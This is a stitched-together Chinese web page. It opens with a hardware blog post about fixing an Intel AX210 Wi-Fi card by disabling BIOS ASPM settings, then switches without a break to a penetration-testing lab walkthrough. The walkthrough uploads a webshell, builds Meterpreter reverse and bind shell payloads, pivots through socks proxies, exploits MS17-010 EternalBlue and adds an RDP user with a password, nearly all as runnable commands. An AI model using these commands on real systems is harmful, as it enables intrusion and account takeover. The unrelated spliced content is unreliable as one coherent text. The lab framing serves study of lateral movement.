下經(jīng)過:家里電腦搬到另一個(gè)臥室,距離客廳的主路由器有點(diǎn)兒遠(yuǎn),中間隔道墻,臥室以前沒接網(wǎng)線,所以就想試下無線上網(wǎng),試過USB的無線網(wǎng)卡,信號(hào)實(shí)在是差,還會(huì)經(jīng)常斷線。想著弄著臺(tái)式機(jī)的無線網(wǎng)卡信號(hào)會(huì)好一些,上網(wǎng)看中了AX210,折騰開始,這網(wǎng)卡是通過轉(zhuǎn)換卡來實(shí)現(xiàn)臺(tái)式機(jī)無線上網(wǎng)的,你拆下來甚至還能給筆記本用。
買后興沖沖的安裝到一個(gè)PCIEx1插槽中,另外還按要求連接了一個(gè)USB9針口。
在intel官網(wǎng)下載了最新的win11下的AX210驅(qū)動(dòng),參考以下網(wǎng)址:
https://www.intel.cn/content/www/cn/zh/products/sku/204836/intel-wifi-6e-ax210-gig/downloads.html
網(wǎng)卡、藍(lán)牙驅(qū)動(dòng)安裝完成后,網(wǎng)卡頭一回露了個(gè)黃臉,但是有問題,說設(shè)備無法啟動(dòng)(代碼10),設(shè)備不存在。你不存在還顯示個(gè)啥呢?
但在電腦重啟之后,網(wǎng)卡干脆再不出現(xiàn)了。藍(lán)牙倒是OK,我還專門試了下,正常連接了藍(lán)牙耳機(jī)播放!也就說,AX210安裝后只有藍(lán)牙設(shè)備!這商家不會(huì)坑我吧?但看網(wǎng)卡確實(shí)是很新,不像二手貨。
和店家聯(lián)系之后,讓換插槽試驗(yàn),但無論我如何換到哪個(gè)PCI槽,都是只有藍(lán)牙,AX210顯卡消失無影。讓我看bios設(shè)置,全部的PCIE正常,USB設(shè)置打開,老板也沒門了。
我這主板有5個(gè)PCIE,全部開著,而且都是自動(dòng)。我把全部插槽都試了一遍!
網(wǎng)絡(luò)上搜索辦法,都沒有更好的應(yīng)對(duì),我這機(jī)器的配置是華擎Asrock z390 pro4+i5 9600K,按說AX210是支持的,不存在說Ax211這種還需要10代CPU以上才行。
得,換臺(tái)Win10試下吧,可能是Windows11支持不太好?(但感覺網(wǎng)上驅(qū)動(dòng)是直接從intel官網(wǎng)下載的,還明確說明了是支持Win11)
Windows10更折騰,首先也是顯示出黃色的網(wǎng)卡,與Windows11有所區(qū)別,這回給你來個(gè)
Windows仍在設(shè)置此設(shè)備的類配置(代碼56)。
安裝驅(qū)動(dòng)試下,結(jié)果無法安裝了...
一番搜索,得知,網(wǎng)卡驅(qū)動(dòng)可能會(huì)和vmware沖突,果斷卸載vmware網(wǎng)上后驅(qū)動(dòng)是能夠安裝了,但問題依舊!還是代碼56,頭大!這AX210網(wǎng)卡這么嬌貴的么?還不能有其它網(wǎng)卡?
實(shí)在沒轍了,準(zhǔn)備拆卡返還商家,腦海中突然閃現(xiàn)出過去經(jīng)常用的硬件沖突解決辦法:載入bios默認(rèn)設(shè)置!
好,網(wǎng)卡換回win11系統(tǒng),進(jìn)入bios, 載入U(xiǎn)EFI default,即bios的缺省設(shè)置
電腦一通重啟,啊哈,一切正常。
網(wǎng)速也還行,我家還是100M寬帶,見笑。
解決是解決了,但到底是哪個(gè)bios配置在影響無線網(wǎng)卡的正常驅(qū)動(dòng)呢?研究之后,發(fā)現(xiàn)是下面這幾項(xiàng)影響了AX210的正常驅(qū)動(dòng):
PCIE ASPM Support
PCH PCIE ASPM Support
DMI ASPM Support
PCH DMI ASPM Support
ASPM是個(gè)啥鬼?ASPM,主動(dòng)狀態(tài)電源管理Active State Power Management。看了一堆資料,這設(shè)置能夠降低PCIE的功耗,個(gè)人理解,讓電腦自動(dòng)管理PCIE中的電能,可能會(huì)造成PCIE插槽供電問題,畢竟這款 AX210是通過轉(zhuǎn)接卡來使用的,可能就沒有啥電源管理,所以未能正常工作,解決辦法就是關(guān)掉自動(dòng)化的電源管理,讓PCIE一直工作,則一切正常!要說影響,可能就是會(huì)影響到NVME固態(tài)硬盤的溫度!咱家用電腦的,也不會(huì)工作太久,畢竟固態(tài)硬盤也是有散熱裝備的,也希望硬件大神們能有更詳細(xì)的解釋。
如果你也遇到過無線網(wǎng)卡類似的毛病,那么思路就應(yīng)該放在pcie的電源管理上,而最終實(shí)在沒辦法的解決方案就是:
我是@愛玩的安哥,關(guān)注我獲取更多有用知識(shí)
近年來,攻擊者潛伏在企業(yè)內(nèi)網(wǎng)進(jìn)行攻擊的安全事件屢見不鮮,攻擊者在經(jīng)常會(huì)企業(yè)的內(nèi)網(wǎng)進(jìn)行橫向滲透,令防守方防不勝防。因此,我們應(yīng)該嚴(yán)格控制好網(wǎng)絡(luò)區(qū)域之間的訪問規(guī)則,加大攻擊橫向滲透的阻力。本文由錦行科技的安全研究團(tuán)隊(duì)提供,旨在通過實(shí)驗(yàn)演示進(jìn)一步了解攻擊者是如何在多層內(nèi)網(wǎng)進(jìn)行的滲透。
沒有耐心看完的看這里:
網(wǎng)絡(luò)安全是一門大學(xué)問,要想理解透徹還得一步一步來,對(duì)此,我整理了一份小白走向滲透的知識(shí)總結(jié),還有視頻素材,可以對(duì)比著學(xué)習(xí)
需要的關(guān)注我:私信回復(fù)“資料”獲取更多滲透測試、網(wǎng)絡(luò)安全資料
滲透機(jī):win10+kali
第一層靶機(jī) (外網(wǎng)web服務(wù)器): Linux
第二場靶機(jī) (內(nèi)網(wǎng)web服務(wù)器): Linux
第三層靶機(jī) (內(nèi)網(wǎng)辦公機(jī)) : win7
用三層網(wǎng)絡(luò)來模擬內(nèi)外網(wǎng)環(huán)境,主要了解MSF、內(nèi)網(wǎng)轉(zhuǎn)發(fā)等。
把滲透機(jī)kali和win10網(wǎng)卡1設(shè)置選擇VMnet1:
靶機(jī)Linux網(wǎng)卡1設(shè)置選擇VMnet1,添加網(wǎng)卡2 設(shè)置選擇VMnet2:
將第二臺(tái)靶機(jī)Linux網(wǎng)卡1設(shè)置選擇VMnet2,添加網(wǎng)卡2 設(shè)置選擇VMnet3:
將靶機(jī)win7網(wǎng)卡1設(shè)置選擇VMnet3:
再配置好各臺(tái)機(jī)器對(duì)應(yīng)IP即可。
在第一臺(tái)Linux和第二臺(tái)Linux上搭建一個(gè)php上傳頁面,設(shè)為存在文件上傳漏洞的web頁面,以便后續(xù)的拿shell進(jìn)行內(nèi)網(wǎng)滲透。
win10訪問http://192.168.85.131/直接上傳一句話木馬
打開kali msfconsole 輸入msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
use exploit/multi/handler 使用監(jiān)聽模塊
set payload linux/x64/meterpreter/reverse_tcp 使用和木馬相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木馬的端口
run 執(zhí)行
蟻劍打開虛擬終端cd到后門文件的目錄下,執(zhí)行后門文件,輸入
chmod 777 mshell.elf 加執(zhí)行權(quán)限
./mshell.elf 執(zhí)行文件
輸入ifconfig,發(fā)現(xiàn)第二層172.10.10.0/24網(wǎng)段
background 將會(huì)話轉(zhuǎn)到后臺(tái)
route add 172.10.10.0/24 1
添加 172.10.10.0/24網(wǎng)段 使用session1
route print 查看路由表
use auxiliary/server/socks4a
set srvhost 192.168.85.128
set srvport 10080
run
配置socks4代理的相關(guān)客戶端Proxychains
在配置文件/etc/proxychains.conf中添加:
socks4 192.168.85.128 10080
vi /etc/proxychains.conf
添加socks4 192.168.85.128 10080
這樣利用proxychains啟動(dòng)的應(yīng)用都可以帶sock4代理,proxychains 為kali自帶的,非MSF里的。
建立好代理后滲透機(jī)可以通過這臺(tái)Linux當(dāng)跳板機(jī)進(jìn)入第二層網(wǎng)絡(luò)
nmap探測存在web服務(wù)的主機(jī)
用proxychans啟動(dòng)nmap對(duì)第二層網(wǎng)段進(jìn)行80端口掃描,執(zhí)行proxychains nmap -sT -Pn -p 80 172.10.10.0/24
掃描發(fā)現(xiàn)55和56存在web服務(wù),172.10.10.56即為第二層網(wǎng)絡(luò)的ip
由于proxychains無法代理icmp的數(shù)據(jù)包,所以必須添加-sT -Pn參數(shù),即不檢測主機(jī)是否存活,直接進(jìn)行端口tcp掃描。
腳本探測存活主機(jī)
在本地創(chuàng)建一個(gè)名為ping.sh的腳本,腳本內(nèi)容如下:
#!/bin/bash
ip=”172.10.10.”
echo “ping log:” > ./ping.txt
for i in {1..254}
do
ping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &
done
echo “wait 5s….”
sleep 5
cat ./ping.txt
cat ./ping.txt | wc -l
Kali進(jìn)入session1會(huì)話,然后upload命令上傳剛剛創(chuàng)建的腳本到靶機(jī)upload /root/ping.sh /var/www/hrml/upload
進(jìn)入shell執(zhí)行
python -c ‘import pty;pty.spawn(“/bin/bash”)’
創(chuàng)建一個(gè)完全交互式shell,后
Chmod 777 ping.sh
./ping.sh
可以看到172.10.10.0/24網(wǎng)段存活56.57兩臺(tái)
知道存活主機(jī)ip后就可以繼續(xù)進(jìn)入第二層內(nèi)網(wǎng)主機(jī)
滲透機(jī)瀏覽器配置sock4a代理
蟻劍加代理連接
連接 http://172.10.10.56/upload/php1.php
進(jìn)一步做內(nèi)網(wǎng)滲透,繼續(xù)上傳msf后門
制作MSF后門
返回kali msf 輸入
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf
生成 mshell1.elf后門文件
因?yàn)樵趦?nèi)網(wǎng)跨網(wǎng)段時(shí)無法反向代理連接到滲透的機(jī)器,所以這里使用linux/x64/meterpreter/bind_tcp 這個(gè)payload進(jìn)行正向代理連接。
蟻劍上傳后門
蟻劍打開虛擬終端執(zhí)行后門文件
返回會(huì)話
輸入ifconfig 發(fā)現(xiàn)第三層網(wǎng)絡(luò)的網(wǎng)段10.10.10.0/24
background
route add 10.10.10.0/24 2
route print
進(jìn)入session 2 上傳 腳本 探測存活主機(jī)
注意把腳本的ip段修改成該網(wǎng)段再上傳
探測到第三層網(wǎng)段的存活ip :10.10.10.101
proxychans 啟動(dòng)nmap對(duì)10.10.10.101的1-500端口掃描,執(zhí)行
proxychains nmap -sT -Pn -p 1-500 10.10.10.101
發(fā)現(xiàn)445端口開啟
嘗試使用ms17-010
use windows/smb/ms17_010_eternalblue
set rhost 10.10.10.101
set payload windows/x64/meterpreter/bind_tcp
set lport 4466
Run ,存在445漏洞
執(zhí)行成功,返回會(huì)話
開啟3389遠(yuǎn)程桌面
run post/windows/manage/enable_rdp 開啟遠(yuǎn)程桌面
run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加遠(yuǎn)程用戶
將3389端口轉(zhuǎn)回kali本地5555端口
portfwd add -l 5555 -p 3389 -r 10.10.10.101
網(wǎng)絡(luò)安全是一門大學(xué)問,要想理解透徹還得一步一步來,對(duì)此,我整理了一份小白走向滲透的知識(shí)總結(jié),還有視頻素材,可以對(duì)比著學(xué)習(xí),大家下載就行
關(guān)注我、私信回復(fù)“資料”獲取更多滲透測試、網(wǎng)絡(luò)安全資料
好了,大概內(nèi)網(wǎng)滲透流程就是這樣子,喜歡本文的轉(zhuǎn)發(fā)關(guān)注我~